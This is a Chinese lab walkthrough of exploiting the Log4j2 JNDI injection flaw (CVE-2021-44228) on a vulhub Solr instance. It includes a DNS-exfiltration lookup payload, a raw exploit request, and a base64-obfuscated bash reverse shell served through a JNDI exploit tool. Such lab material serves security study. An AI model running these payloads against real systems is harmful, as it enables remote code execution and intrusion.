vulhub中Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。

1.服务启动后,访问`http://your-ip:8983`即可查看到Apache Solr的后台页面。

2.`{jndi:dns://{sys:java.version}.example.com}`是利用JNDI发送DNS请求的Payload,我们将其作为管理员接口的action参数值发送如下数据包:

复制代码
GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

3.我们可以在DNS日志平台收到相关日志,显示出当前Java版本:

4.利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all获得shell,

复制代码
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.64.43"

访问下面链接,成功反弹

复制代码
http://192.168.188.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.64.43:1389/08zqfe}

参考:hrrps://blog.csdn.net/Bossfrank/article/details/130148819

相关推荐
DevSecOps选型指南29 分钟前
2025SCA工具推荐︱基于多模态SCA的新一代开源供应链风险审查与治理平台
安全·开源·devsecops·软件供应链安全厂商·软件供应链安全工具
安全系统学习2 小时前
网络安全之任意文件读取利用
算法·安全·web安全·网络安全·哈希算法
Coovally AI模型快速验证4 小时前
数据集分享 | 电力检测数据集,助力AI守护电网安全
人工智能·算法·安全·计算机视觉·目标跟踪
三维频道6 小时前
多相机数字图像相关 DIC 技术:精准测量桁架静载扭转全场变形,赋能建筑结构安全评估
数码相机·安全·多相机数字图像相关 dic·桁架静载扭转测试·全场变形测量·建筑结构安全评估’·非接触式测量技术
kali-Myon6 小时前
攻防世界[level7]-Web_php_wrong_nginx_config
前端·nginx·安全·php·web·ctf·攻防世界
栗子味清清6 小时前
API 管理系统实践指南:监控、安全、性能全覆盖
安全·ai·ai作画·架构·api·数据安全
白仑色7 小时前
在 Java 中操作 Map时,高效遍历和安全删除数据
java·开发语言·安全
百度安全7 小时前
BCS 2025|百度大模型安全解决方案入选中国网络安全优秀案例
安全·web安全·百度
鹿鸣天涯7 小时前
网络安全攻防演习安全保障解决方案
网络·安全·web安全
浮江雾8 小时前
SSRF4 SSRF-gopher 协议扩展利用-向内网发起 GET/POST 请求
安全·web安全·网络安全·get·post·ssrf·gopher